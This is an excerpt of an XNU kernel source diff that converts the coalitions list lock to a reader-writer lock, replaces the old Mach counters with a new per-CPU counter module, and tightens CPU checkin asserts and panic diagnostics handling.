@@ -1198,7 +1198,7 @@ coalition_create_internal(int type, int role, boolean_t privileged, coalition_t
 
        lck_mtx_init(&new_coal->lock, &coalitions_lck_grp, LCK_ATTR_NULL);
 
-       lck_mtx_lock(&coalitions_list_lock);
+       lck_rw_lock_exclusive(&coalitions_list_lock);
        new_coal->id = coalition_next_id++;
        coalition_count++;
        enqueue_tail(&coalitions_q, &new_coal->coalitions);
@@ -1215,7 +1215,7 @@ coalition_create_internal(int type, int role, boolean_t privileged, coalition_t
 #endif
        cid = new_coal->id;
        ctype = new_coal->type;
-       lck_mtx_unlock(&coalitions_list_lock);
+       lck_rw_unlock_exclusive(&coalitions_list_lock);
 
        coal_dbg("id:%llu, type:%s", cid, coal_type_str(ctype));
 
@@ -1281,22 +1281,29 @@ coalition_release(coalition_t coal)
  * coalition_find_by_id_internal
  * Returns: Coalition object with specified id, NOT referenced.
  *          If not found, returns COALITION_NULL.
- * Condition: coalitions_list_lock must be LOCKED.
+ *          If found, returns a locked coalition.
+ *
+ * Condition: No locks held
  */
 static coalition_t
 coalition_find_by_id_internal(uint64_t coal_id)
 {
+       coalition_t coal;
+
        if (coal_id == 0) {
                return COALITION_NULL;
        }
 
-       lck_mtx_assert(&coalitions_list_lock, LCK_MTX_ASSERT_OWNED);
-       coalition_t coal;
+       lck_rw_lock_shared(&coalitions_list_lock);
        qe_foreach_element(coal, &coalitions_q, coalitions) {
                if (coal->id == coal_id) {
+                       coalition_lock(coal);
+                       lck_rw_unlock_shared(&coalitions_list_lock);
                        return coal;
                }
        }
+       lck_rw_unlock_shared(&coalitions_list_lock);
+
        return COALITION_NULL;
 }
 
@@ -1308,23 +1315,16 @@ coalition_find_by_id_internal(uint64_t coal_id)
 coalition_t
 coalition_find_by_id(uint64_t cid)
 {
-       if (cid == 0) {
-               return COALITION_NULL;
-       }
-
-       lck_mtx_lock(&coalitions_list_lock);
-
        coalition_t coal = coalition_find_by_id_internal(cid);
+
        if (coal == COALITION_NULL) {
-               lck_mtx_unlock(&coalitions_list_lock);
                return COALITION_NULL;
        }
 
-       coalition_lock(coal);
+       /* coal is locked */
 
        if (coal->reaped) {
                coalition_unlock(coal);
-               lck_mtx_unlock(&coalitions_list_lock);
                return COALITION_NULL;
        }
 
@@ -1338,7 +1338,6 @@ coalition_find_by_id(uint64_t cid)
 #endif
 
        coalition_unlock(coal);
-       lck_mtx_unlock(&coalitions_list_lock);
 
        coal_dbg("id:%llu type:%s ref_count:%u",
            coal->id, coal_type_str(coal->type), rc);
@@ -1357,25 +1356,18 @@ coalition_find_by_id(uint64_t cid)
 coalition_t
 coalition_find_and_activate_by_id(uint64_t cid)
 {
-       if (cid == 0) {
-               return COALITION_NULL;
-       }
-
-       lck_mtx_lock(&coalitions_list_lock);
-
        coalition_t coal = coalition_find_by_id_internal(cid);
+
        if (coal == COALITION_NULL) {
-               lck_mtx_unlock(&coalitions_list_lock);
                return COALITION_NULL;
        }
 
-       coalition_lock(coal);
+       /* coal is locked */
 
        if (coal->reaped || coal->terminated) {
                /* Too late to put something new into this coalition, it's
                 * already on its way out the door */
                coalition_unlock(coal);
-               lck_mtx_unlock(&coalitions_list_lock);
                return COALITION_NULL;
        }
 
@@ -1393,7 +1385,6 @@ coalition_find_and_activate_by_id(uint64_t cid)
 #endif
 
        coalition_unlock(coal);
-       lck_mtx_unlock(&coalitions_list_lock);
 
        coal_dbg("id:%llu type:%s ref_count:%u, active_count:%u",
            coal->id, coal_type_str(coal->type), rc, ac);
@@ -2003,10 +1994,10 @@ coalition_reap_internal(coalition_t coal)
 
        coalition_unlock(coal);
 
-       lck_mtx_lock(&coalitions_list_lock);
+       lck_rw_lock_exclusive(&coalitions_list_lock);
        coalition_count--;
        remqueue(&coal->coalitions);
-       lck_mtx_unlock(&coalitions_list_lock);
+       lck_rw_unlock_exclusive(&coalitions_list_lock);
 
        /* Release the list's reference and launchd's reference. */
        coalition_release(coal);
@@ -2116,7 +2107,7 @@ coalitions_get_list(int type, struct procinfo_coalinfo *coal_list, int list_sz)
        int ncoals = 0;
        struct coalition *coal;
 
-       lck_mtx_lock(&coalitions_list_lock);
+       lck_rw_lock_shared(&coalitions_list_lock);
        qe_foreach_element(coal, &coalitions_q, coalitions) {
                if (!coal->reaped && (type < 0 || type == (int)coal->type)) {
                        if (coal_list && ncoals < list_sz) {
@@ -2125,7 +2116,7 @@ coalitions_get_list(int type, struct procinfo_coalinfo *coal_list, int list_sz)
                        ++ncoals;
                }
        }
-       lck_mtx_unlock(&coalitions_list_lock);
+       lck_rw_unlock_shared(&coalitions_list_lock);
 
        return ncoals;
 }
diff --git a/osfmk/kern/counter.h b/osfmk/kern/counter.h
new file mode 100644 (file)
index 0000000..f7a43fa
--- /dev/null
@@ -0,0 +1,231 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+#ifdef XNU_KERNEL_PRIVATE
+
+#ifndef _KERN_COUNTER_H
+#define _KERN_COUNTER_H
+
+/*!
+ * @file <kern/counter.h>
+ *
+ * @brief
+ * Module for working with 64bit relaxed atomic counters.
+ *
+ * @discussion
+ * Different counter types have different speed-memory tradeoffs, but
+ * they all share a common interface.
+ *
+ * Counters can be statically allocated or dynamically allocated.
+ *
+ * Statically allocated counters are always backed by per-cpu storage which means
+ * writes take place on the current CPUs value and reads sum all of the per-cpu values.
+ *
+ * Dynamically allocated counters can be either per-cpu or use a single 64bit value.
+ * To create a per-cpu counter, use the scalable_counter_t type. Note that this
+ * trades of additional memory for better scalability.
+ * To create a single 64bit counter, use the atomic_counter_t type.
+ *
+ * For most counters you can just use the counter_t type and the choice of
+ * scalable or atomic will be made at compile time based on the target.
+ *
+ * The counter types are opaque handles. They ARE NOT COPYABLE. If you need
+ * to make a copy of a counter, you should do so like this:
+ * <code>
+ * counter_t original;
+ * ...
+ * counter_t copy;
+ * counter_alloc(&copy);
+ * counter_add(&copy, counter_load(&original));
+ * ...
+ * // Make sure to free them at some point.
+ * counter_free(&original);
+ * counter_free(&copy);
+ * </code>
+ *
+ * Static counter example:
+ * <code>
+ * SCALABLE_COUNTER_DEFINE(my_counter);
+ * ...
+ * counter_inc(&my_counter);
+ * assert(counter_load(&my_counter) == 1);
+ * </code>
+ *
+ * Dynamic Counter Example:
+ * <code>
+ * scalable_counter_t my_percpu_counter;
+ * atomic_counter_t my_atomic_counter;
+ * counter_t my_counter;
+ *
+ * // All three counters share the same interface. So to change the speed-memory
+ * // tradeoff just change the type.
+ * counter_init(&my_scalable_counter);
+ * counter_init(&my_atomic_counter);
+ * counter_init(&my_counter);
+ *
+ * counter_inc(&my_scalable_counter);
+ * counter_inc(&my_atomic_counter);
+ * counter_inc(&my_counter);
+ *
+ * assert(counter_load(&my_scalable_counter) == 1);
+ * assert(counter_load(&my_atomic_counter) == 1);
+ * assert(counter_load(&my_counter) == 1);
+ * </code>
+ */
+
+#include <mach/mach_types.h>
+#include <kern/macro_help.h>
+#include <kern/startup.h>
+#include <kern/zalloc.h>
+
+typedef __zpercpu uint64_t *scalable_counter_t;
+typedef uint64_t atomic_counter_t;
+/* Generic counter base type. Does not have an implementation. */
+struct generic_counter_t;
+
+/*!
+ * @macro SCALABLE_COUNTER_DECLARE
+ *
+ * @abstract
+ * (optionally) declares a static per-cpu counter (in a header).
+ *
+ * @param var           the name of the counter.
+ */
+#define SCALABLE_COUNTER_DECLARE(name) \
+       extern scalable_counter_t name;
+
+/*!
+ * @macro SCALABLE_COUNTER_DEFINE
+ *
+ * @abstract
+ * Defines a static per-cpu counter.
+ * Counter can only be accessed after the TUNABLES phase of startup.
+ *
+ * @param var           the name of the counter.
+ */
+#define SCALABLE_COUNTER_DEFINE(name) \
+       __startup_data uint64_t __ ##name##_early_storage = 0;                                   \
+       scalable_counter_t name = {&__##name##_early_storage};                                   \
+       STARTUP_ARG(TUNABLES, STARTUP_RANK_MIDDLE, scalable_counter_static_boot_mangle, &name);  \
+       STARTUP_ARG(PERCPU, STARTUP_RANK_SECOND, scalable_counter_static_init, &name);
+
+/*
+ * Initialize a per-cpu counter.
+ * May block and will never fail.
+ * This counter must be freed with counter_free.
+ */
+OS_OVERLOADABLE
+extern void counter_alloc(struct generic_counter_t *);
+
+OS_OVERLOADABLE
+extern void counter_free(struct generic_counter_t *);
+/*
+ * Add amount to counter.
+ * @param amount: The amount to add.
+ */
+OS_OVERLOADABLE
+extern void counter_add(struct generic_counter_t *, uint64_t amount);
+
+/*
+ * Add 1 to this counter.
+ */
+OS_OVERLOADABLE
+extern void counter_inc(struct generic_counter_t *);
+
+/*
+ * Subtract 1 from this counter.
+ */
+OS_OVERLOADABLE
+extern void counter_dec(struct generic_counter_t *);
+
+/* Variants of the above operations where the caller takes responsibility for disabling preemption. */
+OS_OVERLOADABLE
+extern void counter_add_preemption_disabled(struct generic_counter_t *, uint64_t amount);
+OS_OVERLOADABLE
+extern void counter_inc_preemption_disabled(struct generic_counter_t *);
+OS_OVERLOADABLE
+extern void counter_dec_preemption_disabled(struct generic_counter_t *);
+
+/*
+ * Read the value of the percpu counter.
+ * Note that this will cause synchronization of all the sharded values.
+ */
+OS_OVERLOADABLE
+extern uint64_t counter_load(struct generic_counter_t *);
+
+#pragma mark implementation details
+/* NB: Nothing below here should be used directly. */
+
+__startup_func void scalable_counter_static_boot_mangle(scalable_counter_t *counter);
+__startup_func void scalable_counter_static_init(scalable_counter_t *counter);
+
+#if XNU_TARGET_OS_WATCH || XNU_TARGET_OS_TV
+#define ATOMIC_COUNTER_USE_PERCPU 0
+#else
+#define ATOMIC_COUNTER_USE_PERCPU 1
+#endif /* XNU_TARGET_OS_OSX */
+
+#if ATOMIC_COUNTER_USE_PERCPU
+typedef scalable_counter_t counter_t;
+#else
+typedef atomic_counter_t counter_t;
+#endif /* ATOMIC_COUNTER_USE_PERCPU */
+
+#define COUNTER_MAKE_PROTOTYPES(counter_t)                                 \
+OS_OVERLOADABLE                                                            \
+extern void counter_alloc(counter_t *);                                    \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern void counter_free(counter_t *);                                     \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern void counter_add(counter_t *, uint64_t amount);                     \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern void counter_inc(counter_t *);                                      \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern void counter_dec(counter_t *);                                      \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern void counter_add_preemption_disabled(counter_t *, uint64_t amount); \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern void counter_inc_preemption_disabled(counter_t *);                  \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern void counter_dec_preemption_disabled(counter_t *);                  \
+                                                                           \
+OS_OVERLOADABLE                                                            \
+extern uint64_t counter_load(counter_t *);
+
+COUNTER_MAKE_PROTOTYPES(scalable_counter_t);
+COUNTER_MAKE_PROTOTYPES(atomic_counter_t);
+
+#endif /* _KERN_COUNTER_H */
+
+#endif /* XNU_KERNEL_PRIVATE */
diff --git a/osfmk/kern/counter_common.c b/osfmk/kern/counter_common.c
new file mode 100644 (file)
index 0000000..9b12132
--- /dev/null
@@ -0,0 +1,165 @@
+/* * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#include <kern/assert.h>
+#include <kern/cpu_data.h>
+#include <kern/counter.h>
+#include <kern/zalloc.h>
+#include <machine/atomic.h>
+#include <machine/machine_routines.h>
+#include <machine/cpu_number.h>
+
+SECURITY_READ_ONLY_LATE(zone_t) counters_zone;
+ZONE_INIT(&counters_zone, "per_cpu_counters", sizeof(uint64_t),
+    ZC_PERCPU | ZC_ALIGNMENT_REQUIRED, ZONE_ID_ANY, NULL);
+
+/*
+ * Tracks how many static scalable counters are in use since they won't show up
+ * in the per_cpu_counters zone stats.
+ */
+uint64_t num_static_scalable_counters;
+
+/*
+ * Mangle the given scalable_counter_t so that it points to the early storage
+ * regardless of which CPU # we're boot on.
+ * Must be run before we go multi-core.
+ */
+__startup_func void
+scalable_counter_static_boot_mangle(scalable_counter_t *counter)
+{
+       *counter = __zpcpu_mangle_for_boot(*counter);
+}
+
+/*
+ * Initializes a static counter in permanent per-cpu memory.
+ * Run during startup for each static per-cpu counter
+ * Must be run before we go multi-core.
+ */
+__startup_func void
+scalable_counter_static_init(scalable_counter_t *counter)
+{
+       /*
+        * We pointed the counter to a single global value during early boot.
+        * Grab that value now. We'll store it in our current CPU's value
+        */
+       uint64_t current_value = os_atomic_load_wide(zpercpu_get(*counter), relaxed);
+       /*
+        * This counter can't be freed so we allocate it out of the permanent zone rather than
+        * our counter zone.
+        */
+       *counter = zalloc_percpu_permanent(sizeof(uint64_t), ZALIGN_64);
+       os_atomic_store_wide(zpercpu_get(*counter), current_value, relaxed);
+       num_static_scalable_counters++;
+}
+
+OS_OVERLOADABLE
+void
+counter_alloc(scalable_counter_t *counter)
+{
+       *counter = zalloc_percpu(counters_zone, Z_WAITOK | Z_ZERO | Z_NOFAIL);
+}
+
+OS_OVERLOADABLE
+void
+counter_alloc(atomic_counter_t *counter)
+{
+       os_atomic_store_wide(counter, 0, relaxed);
+}
+
+OS_OVERLOADABLE
+void
+counter_free(scalable_counter_t *counter)
+{
+       zfree_percpu(counters_zone, *counter);
+}
+
+OS_OVERLOADABLE
+void
+counter_free(atomic_counter_t *counter)
+{
+       (void)counter;
+}
+
+OS_OVERLOADABLE
+void
+counter_add(atomic_counter_t *counter, uint64_t amount)
+{
+       os_atomic_add(counter, amount, relaxed);
+}
+
+OS_OVERLOADABLE
+void
+counter_inc(atomic_counter_t *counter)
+{
+       os_atomic_inc(counter, relaxed);
+}
+
+OS_OVERLOADABLE
+void
+counter_dec(atomic_counter_t *counter)
+{
+       os_atomic_dec(counter, relaxed);
+}
+
+OS_OVERLOADABLE
+void
+counter_add_preemption_disabled(atomic_counter_t *counter, uint64_t amount)
+{
+       counter_add(counter, amount);
+}
+
+OS_OVERLOADABLE
+void
+counter_inc_preemption_disabled(atomic_counter_t *counter)
+{
+       counter_inc(counter);
+}
+
+OS_OVERLOADABLE
+void
+counter_dec_preemption_disabled(atomic_counter_t *counter)
+{
+       counter_dec(counter);
+}
+
+OS_OVERLOADABLE
+uint64_t
+counter_load(atomic_counter_t *counter)
+{
+       return os_atomic_load_wide(counter, relaxed);
+}
+
+OS_OVERLOADABLE
+uint64_t
+counter_load(scalable_counter_t *counter)
+{
+       uint64_t value = 0;
+       zpercpu_foreach(it, *counter) {
+               value += os_atomic_load_wide(it, relaxed);
+       }
+       return value;
+}
diff --git a/osfmk/kern/counters.c b/osfmk/kern/counters.c
deleted file mode 100644 (file)
index 2e56e41..0000000
+++ /dev/null
@@ -1,108 +0,0 @@
-/*
- * Copyright (c) 2000-2007 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-/*
- * @OSF_COPYRIGHT@
- */
-/*
- * Mach Operating System
- * Copyright (c) 1991,1990,1989,1988,1987 Carnegie Mellon University
- * All Rights Reserved.
- *
- * Permission to use, copy, modify and distribute this software and its
- * documentation is hereby granted, provided that both the copyright
- * notice and this permission notice appear in all copies of the
- * software, derivative works or modified versions, and any portions
- * thereof, and that both notices appear in supporting documentation.
- *
- * CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS"
- * CONDITION.  CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR
- * ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE.
- *
- * Carnegie Mellon requests users of this software to return to
- *
- *  Software Distribution Coordinator  or  Software.Distribution@CS.CMU.EDU
- *  School of Computer Science
- *  Carnegie Mellon University
- *  Pittsburgh PA 15213-3890
- *
- * any improvements or extensions that they make and grant Carnegie Mellon
- * the rights to redistribute these changes.
- */
-/*
- */
-
-#include <mach_counters.h>
-
-#include <kern/counters.h>
-
-/*
- *     We explicitly initialize the counters to make
- *     them contiguous in the kernel's data space.
- *     This makes them easier to examine with ddb.
- */
-
-#if     MACH_COUNTERS
-mach_counter_t c_action_thread_block = 0;
-mach_counter_t c_ast_taken_block = 0;
-mach_counter_t c_dev_io_blocks = 0;
-mach_counter_t c_dev_io_tries = 0;
-mach_counter_t c_idle_thread_block = 0;
-mach_counter_t c_idle_thread_handoff = 0;
-mach_counter_t c_incoming_interrupts = 0;
-mach_counter_t c_io_done_thread_block = 0;
-mach_counter_t c_ipc_mqueue_receive_block_kernel = 0;
-mach_counter_t c_ipc_mqueue_receive_block_user = 0;
-mach_counter_t c_ipc_mqueue_send_block = 0;
-mach_counter_t c_net_thread_block = 0;
-mach_counter_t c_reaper_thread_block = 0;
-mach_counter_t c_sched_thread_block = 0;
-mach_counter_t c_stacks_current = 0;
-mach_counter_t c_stacks_max = 0;
-mach_counter_t c_stacks_min = 0;
-mach_counter_t c_swtch_block = 0;
-mach_counter_t c_swtch_pri_block = 0;
-mach_counter_t c_syscalls_unix = 0;
-mach_counter_t c_syscalls_mach = 0;
-mach_counter_t c_thread_invoke_csw = 0;
-mach_counter_t c_thread_invoke_hits = 0;
-mach_counter_t c_thread_invoke_misses = 0;
-mach_counter_t c_thread_invoke_same = 0;
-mach_counter_t c_thread_invoke_same_cont = 0;
-mach_counter_t c_thread_switch_block = 0;
-mach_counter_t c_thread_switch_handoff = 0;
-mach_counter_t c_vm_fault_page_block_backoff_kernel = 0;
-mach_counter_t c_vm_fault_page_block_busy_kernel = 0;
-mach_counter_t c_vm_map_simplified = 0;
-mach_counter_t c_vm_map_simplify_called = 0;
-mach_counter_t c_vm_map_simplify_entry_called = 0;
-mach_counter_t c_vm_page_wait_block = 0;
-mach_counter_t c_vm_pageout_block = 0;
-mach_counter_t c_vm_pageout_scan_block = 0;
-mach_counter_t c_vm_fault_retry_on_w_prot = 0;
-mach_counter_t c_vm_fault_wait_on_unlock = 0;
-#endif  /* MACH_COUNTERS */
diff --git a/osfmk/kern/counters.h b/osfmk/kern/counters.h
deleted file mode 100644 (file)
index e0f9aae..0000000
+++ /dev/null
@@ -1,133 +0,0 @@
-/*
- * Copyright (c) 2000-2007 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-/*
- * @OSF_COPYRIGHT@
- */
-/*
- * Mach Operating System
- * Copyright (c) 1991,1990,1989,1988,1987 Carnegie Mellon University
- * All Rights Reserved.
- *
- * Permission to use, copy, modify and distribute this software and its
- * documentation is hereby granted, provided that both the copyright
- * notice and this permission notice appear in all copies of the
- * software, derivative works or modified versions, and any portions
- * thereof, and that both notices appear in supporting documentation.
- *
- * CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS"
- * CONDITION.  CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR
- * ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE.
- *
- * Carnegie Mellon requests users of this software to return to
- *
- *  Software Distribution Coordinator  or  Software.Distribution@CS.CMU.EDU
- *  School of Computer Science
- *  Carnegie Mellon University
- *  Pittsburgh PA 15213-3890
- *
- * any improvements or extensions that they make and grant Carnegie Mellon
- * the rights to redistribute these changes.
- */
-/*
- */
-
-#ifndef _KERN_COUNTERS_
-#define _KERN_COUNTERS_
-
-#include <mach_counters.h>
-
-/*
- *     We can count various interesting events and paths.
- *
- *     Use counter() to change the counters, eg:
- *             counter(c_idle_thread_block++);
- *     Use counter_always() for non-conditional counters.
- */
-
-#define counter_always(code)    code
-
-#if     MACH_COUNTERS
-
-#define counter(code)           counter_always(code)
-
-#else   /* MACH_COUNTERS */
-
-#define counter(code)
-
-#endif  /* MACH_COUNTERS */
-
-/*
- *     We define the counters with individual integers,
- *     instead of a big structure, so that ddb
- *     will know the addresses of the counters.
- */
-
-typedef unsigned int mach_counter_t;
-
-#if     MACH_COUNTERS
-extern mach_counter_t c_action_thread_block;
-extern mach_counter_t c_ast_taken_block;
-extern mach_counter_t c_dev_io_blocks;
-extern mach_counter_t c_dev_io_tries;
-extern mach_counter_t c_idle_thread_block;
-extern mach_counter_t c_idle_thread_handoff;
-extern mach_counter_t c_incoming_interrupts;
-extern mach_counter_t c_io_done_thread_block;
-extern mach_counter_t c_ipc_mqueue_receive_block_kernel;
-extern mach_counter_t c_ipc_mqueue_receive_block_user;
-extern mach_counter_t c_ipc_mqueue_send_block;
-extern mach_counter_t c_net_thread_block;
-extern mach_counter_t c_reaper_thread_block;
-extern mach_counter_t c_sched_thread_block;
-extern mach_counter_t c_stacks_current;
-extern mach_counter_t c_stacks_max;
-extern mach_counter_t c_stacks_min;
-extern mach_counter_t c_swtch_block;
-extern mach_counter_t c_swtch_pri_block;
-extern mach_counter_t c_syscalls_unix;
-extern mach_counter_t c_syscalls_mach;
-extern mach_counter_t c_thread_invoke_csw;
-extern mach_counter_t c_thread_invoke_same;
-extern mach_counter_t c_thread_invoke_same_cont;
-extern mach_counter_t c_thread_invoke_misses;
-extern mach_counter_t c_thread_invoke_hits;
-extern mach_counter_t c_thread_switch_block;
-extern mach_counter_t c_thread_switch_handoff;
-extern mach_counter_t c_vm_fault_page_block_backoff_kernel;
-extern mach_counter_t c_vm_fault_page_block_busy_kernel;
-extern mach_counter_t c_vm_fault_retry_on_w_prot;
-extern mach_counter_t c_vm_fault_wait_on_unlock;
-extern mach_counter_t c_vm_map_simplified;
-extern mach_counter_t c_vm_map_simplify_called;
-extern mach_counter_t c_vm_map_simplify_entry_called;
-extern mach_counter_t c_vm_page_wait_block;
-extern mach_counter_t c_vm_pageout_block;
-extern mach_counter_t c_vm_pageout_scan_block;
-#endif  /* MACH_COUNTERS */
-
-#endif  /* _KERN_COUNTERS_ */
index 2ca5f67f0ac3bc28e4ebec22ee2f971d8b600c40..7c613b5c623818da56d8b29ce99e456f97d6e6d9 100644 (file)
@@ -90,16 +90,17 @@ static uint64_t cpu_checkin_min_interval;
 static uint32_t cpu_checkin_min_interval_us;
 
 #if __LP64__
-static_assert(MAX_CPUS <= 32);
-#define CPU_CHECKIN_MASK        0x5555555555555555UL
-#define CPU_EXPECTED_MASK       (~CPU_CHECKIN_MASK)
+#define CPU_CHECKIN_MASK_MAX_CPUS 32
+#define CPU_CHECKIN_MASK          0x5555555555555555UL
+#define CPU_EXPECTED_MASK         (~CPU_CHECKIN_MASK)
 #else
 /* Avoid double-wide CAS on 32-bit platforms by using a 32-bit state and mask */
-static_assert(MAX_CPUS <= 16);
-#define CPU_CHECKIN_MASK        0x55555555UL
-#define CPU_EXPECTED_MASK       (~CPU_CHECKIN_MASK)
+#define CPU_CHECKIN_MASK_MAX_CPUS 16
+#define CPU_CHECKIN_MASK          0x55555555UL
+#define CPU_EXPECTED_MASK         (~CPU_CHECKIN_MASK)
 #endif
 
+static_assert(MAX_CPUS <= CPU_CHECKIN_MASK_MAX_CPUS);
 static_assert(CPU_CHECKIN_MASK == CPU_EXPECTED_MASK >> 1);
 
 static inline checkin_mask_t
@@ -117,10 +118,10 @@ cpu_expected_bit(int cpuid)
 void
 cpu_quiescent_counter_init(void)
 {
-       assert(CPU_CHECKIN_MASK & cpu_checked_in_bit(MAX_CPUS));
-       assert(CPU_EXPECTED_MASK & cpu_expected_bit(MAX_CPUS));
-       assert((CPU_CHECKIN_MASK & cpu_expected_bit(MAX_CPUS)) == 0);
-       assert((CPU_EXPECTED_MASK & cpu_checked_in_bit(MAX_CPUS)) == 0);
+       assert(CPU_CHECKIN_MASK & cpu_checked_in_bit(MAX_CPUS - 1));
+       assert(CPU_EXPECTED_MASK & cpu_expected_bit(MAX_CPUS - 1));
+       assert((CPU_CHECKIN_MASK & cpu_expected_bit(MAX_CPUS - 1)) == 0);
+       assert((CPU_EXPECTED_MASK & cpu_checked_in_bit(MAX_CPUS - 1)) == 0);
 
        cpu_quiescent_counter_set_min_interval_us(CPU_CHECKIN_MIN_INTERVAL_US);
 }
@@ -192,6 +193,7 @@ cpu_quiescent_counter_join(__unused uint64_t ctime)
        struct cpu_quiesce *st = PERCPU_GET(cpu_quiesce);
        __assert_only int cpuid = cpu_number();
 
+       assert(cpuid < MAX_CPUS);
        assert(st->state == CPU_QUIESCE_COUNTER_NONE ||
            st->state == CPU_QUIESCE_COUNTER_LEFT);
 
index 0cb5ea8100ecc045e1652c0cbb8dee6a0b08d38d..fcb23e1f7facff8a2aa0fa1d88b519578e928b50 100644 (file)
@@ -1058,7 +1058,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned
         * conventional sense.
         */
        if (debugger_current_op == DBOP_PANIC || ((debugger_current_op == DBOP_DEBUGGER) && debugger_is_panic))
-#endif
+#endif /* __x86_64__ */
        {
                kdp_callouts(KDP_EVENT_PANICLOG);
 
@@ -1075,6 +1075,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned
 
                /* DEBUGGER_OPTION_PANICLOGANDREBOOT is used for two finger resets on embedded so we get a paniclog */
                if (debugger_panic_options & DEBUGGER_OPTION_PANICLOGANDREBOOT) {
+                       PEHaltRestart(kPEPanicDiagnosticsDone);
                        PEHaltRestart(kPEPanicRestartCPUNoCallouts);
                }
        }
@@ -1087,6 +1088,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned
         */
        if ((debugger_panic_options & DEBUGGER_OPTION_SKIP_LOCAL_COREDUMP) &&
            (debug_boot_arg & DB_REBOOT_POST_CORE)) {
+               PEHaltRestart(kPEPanicDiagnosticsDone);
